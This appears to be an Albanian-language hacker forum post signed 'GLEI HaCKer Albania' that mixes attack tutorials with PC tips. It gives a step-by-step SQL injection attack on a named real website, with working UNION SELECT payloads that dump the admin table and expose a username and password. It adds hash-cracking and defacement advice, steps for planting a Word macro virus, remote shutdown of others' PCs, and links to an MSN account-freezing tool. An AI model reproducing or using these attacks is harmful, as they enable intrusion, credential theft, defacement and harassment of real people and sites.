MSN FREEZER

1.HApni Microsoft Word 2.Click ALT-F11 ku do te pop-up nje dritare e quajtur VBA editor 3.ne dritaren "project" do te shohesh "Project (Document1)". 4.Gjej Mircosoft Word Objects pastaj nen te "This Document" 5.Click 2 here ne THis Document , fshij qdo tekst qe na paraqitet ne editor (ne anden e djatht ) 6.Hape Tekstin me Code Virusi.txt Merre ktu Teksti qe te paraqitet bonja Copy tere tekstit dmth CTRL+A. 7.Kthehu prapa ne fqen e hapur nga ALT+F11 nga Wordi dhe commanden PASTE praktiko. 8.Shtyp ALT-Q ku te kthen ne WORD. 9.Ruaje DOkumentin. ..By..GLEI..HaCKer..Albania..

KRIJO VIRUS
1.HApni Microsoft Word 2.Click ALT-F11 ku do te pop-up nje dritare e quajtur VBA editor 3.ne dritaren "project" do te shohesh "Project (Document1)". 4.Gjej Mircosoft Word Objects pastaj nen te "This Document" 5.Click 2 here ne THis Document , fshij qdo tekst qe na paraqitet ne editor (ne anden e djatht ) 6.Hape Tekstin me Code Virusi.txt Merre ktu Teksti qe te paraqitet bonja Copy tere tekstit dmth CTRL+A. 7.Kthehu prapa ne fqen e hapur nga ALT+F11 nga Wordi dhe commanden PASTE praktiko. 8.Shtyp ALT-Q ku te kthen ne WORD. 9.Ruaje DOkumentin. ..By..GLEI..HaCKer..Albania..
INJECTION SQL
==========================
 tutorial: SQL injection
==========================

==========================
 dork: newsdetail.php?id=
==========================

Ne kete tutorial do ju tregoj se si te hackoni website me SQL injection kur kemi te bejme me SQL version 5.x.x

1.Ne fillim kerkojme ne google me dorkun e lartshenuar...
  shenim: nga ky dork un zgjodha kete sit: http://www.leadacidbatteryinfo.org/newsdetail.php?id=44
        veprimet i keni te shpjeguara ktu tek text dokumenti dhe un do ti bej ne praktike 

2.zgjedhim nje sit dhe per te testuar a eshte vulnerable i shtojme nje ' ...nqs del ndonje
  mesazh i ngjashem me "SQL syntax error..." atehere webi eshte vulnerable dhe mund
  ta hackojme...

3.tani duhet te gjejme nr e columnsave...heqim ' dhe shkruajme order by dhe i provojm
  columnsat derisa na del error... 
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 1--  hapet faqja normal
            http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 5--  hapet faqja normal
            http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 10-- hapet faqja normal
            http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 11-- hapet faqja normal
            http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 12-- na jep error
  kjo do te thote qe columni 12 nuk ekziston ,pra kemi 11 columnsa...

4.tani duhet te gjejm columnat vulnerable...per ta gjetur ,shkruajme union select edhe i 
  shkruajme njeri pas tjetrit te gjithe columnsat...columni ose columnsat qe dalin ,jane
  vulnerable dhe ne mund te kryejme injeksionin tek secili prej tyre...shtojme nje - pas id= pasi duhet ta barazojme me zero dhe nga 44 ,per ta barazuar me zero shkruajme -44
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,8,9,10,11--
  na dolen si columna vulnerable: 3,4,5,8,9...ne mund ta kryejme injeksionin tek secili prej ketyre pa problem
  un po zgjedh 8...

5.per te gjetur versionin e SQL shkruajme tek nje column vulnerable "@@version"...nqs na del
  version 5.x.x do te thote qe eshte e lehte per tu hackuar...nqs komanda e siperme na jep nje error ,atehere aty provojme te shkruajme "convert(@@version using latin1)" nqs edhe kjo nxjerr error ,atehere shkruajme "unhex(hex(@@version))"
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,@@verion,9,10,11--
  nuk nxjerr error...na doli version 5.0.77 qe do te thote se hackohet lehte...

6.duhet te gjejme emrat e tabelave...per ta bere kete shkruajme tek column vulnerable 
  "group_concat(table_name)" dhe pas columnit te fundit shkruajme 
  "from information_schema.tables where table_schema=database()" - ne po kerkojem per nje table qe e ka emrin e ngjashem me: tbl_user, tbl_admin, tbl_access, user, users, member,     members, admin, admins, customer,customers, orders, phpbb_users, phpbb_admins etjjj...
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(table_name),9,10,11 from information_schema.tables where table_schema=database()--
  gjetem si table name - tbladmin

7.per te gjetur emrat e columnave shkruajm te column vulnerable "group_concat(column_name)"  dhe pas columnit te fundit shkruajme "from information_schema.columns where table_name=0x........" (tek pikat shkruajme emrin e tabeles te convertuar ne hex)...mund ta convertoni ate ne hex ne kete faqe: http://www.swingnote.com/tools/texttohex.php
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--

8.tani per te gjetur username dhe password shkruajme kete tek columni vulnerable "group_concat(username,0x3a,password)" dhe pas columnit te fundit shkruajme "from emri i tabeles" pra ne kete rast "from tbladmin"
  shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11 from tbladmin--
  na doli kjo - ishir:ishir123 qe do te thote qe --->
  username: ishir
  password: ishir123
  ne shumicen e rasteve passwordet dalin shume te gjata...kjo ndodh pasi ato jane te encryptuar dhe duhet te decryptohen...
  per ti decryptuar ,mund te perdorni ndonje program por une ju sugjeroj te perdorni decryptues online...nqs decryptusi   online nuk arrin ta decryptoje passordin ,atehere une ju sugjeroj te perdorni nje program - "john the ripper"
  decryptues online:  http://www.md5decrypter.co.uk
  programi decryptues:http://www.openwall.com/john/h/john171w.zip
9.tani na duhet thjesht te gjejm faqen e adminit dhe te logohemi si administrator...
  per te gjetur admin page shkarkoni progrmi poshte: 
  http://uploading.com/files/KCDVDDST/adminfinder.rar.html
  pasi e gjen faqe e administratorit ,i heq indexin qe ka faqja edhe i fut nje index hacked...
 BY GLEI HACKER ALBANIA


SHPEJTO RRJETIN Klikoni Ne .. Start --> RUN --> gpedit.msc dhe Shtypeni Enter Do te ju hapet nje faqe ku do te duhet te veproni: Hapeni "local computer policy" Hapeni "administrative templates" Hapeni "network" Hapeni "QoS Packet Scheduler" Ne Anen e djatht te dritares klikoni ne "limit reservable bandwidth" Dhe klikoni ne "enabled" Pak me posht pasi qe ta beni "Enabled" shkoni ne "Bandwidth limit %" dhe ndrojeni ate prej ne 20 (apo sa eshte) ne 0 dhe klikoni OK.... Pastaj restartoni PC-ne dhe kycuni ne modin normal......dhe to ta shihni ndryshimin...By..GLEI.HacKer..Albania.. SHPEJTO RRJETIN Së pari klikoni te *My Computer* pas andej kliko me anën e djathët të mausit te zakonisht *Drive C:* dhe kliko Properties, në anën e sipërme të tabelës shiqo për Tools dhe atje është *Error checking* *Scan disk* të cilin duhet ta shtini në funksion në *Standard mode* deri sa mos të ketë arsye që kët të bëni në mënyr të plotë *Thorough* Deri sa Standard mode do të zgjasë disa minuta, mënyra e plotë apo *Thorough* mundet të zgjasë me orë të tëra. Pra kët të dytën mundeni ta bëni vetem nëse egzistojn probleme në disk. Pasi që të mbaroj *Disk defragment* atëher fikni kompjuterin,kështu që *Disk defragment* do të jet më i suksesëshm http://www.soft32.com/Download/Free/...6/4-572-1.html E merrni ket prgram , e instaloni, e shihni qe jon dy BOXE per me shkru IP-n Dmth i shkruni kshtu nese IP-ja juaj eshte 192.168.5.64 ateher ne boxin e par e shkrun 192.168.5.1 kurse ne te dytin e shkrun 192.168.5.99 edhe klikon START , dhe programi i skanon te gjitha IP-t , qe jon Aktive dhe JoAktive... Ato aktive jon me ngjyr te kalter... Ne anen e djatht te IP-s shkrun emri i kompjuterit...E mbajm mend emrin e kompjuterit dhe shkojm... Star>>Run>>ShutDown -i>>Add>>E Shkrujm emrin e kompjuterit, edhe ne fund e shkrujm ni text per Viktimien, klikojm OK, edhe pas 20 Sec, viktima e ka kompjuterin e fikur... By..GLEI..HacKer..Albania.. MSN FREEZER Nese ju ka merzitur dikush me msn e merrni kit program edhe e shkruni emailin e viktimes i mshon FREEZE edhe ja bllokon email-in,kur don me ja zhblloku e shkrun emailin e viktimes edhe i mshon UN-FREEZE Code: http://rapidshare.com/files/20536283/50c.rar   MESSAGE BY ADM RAY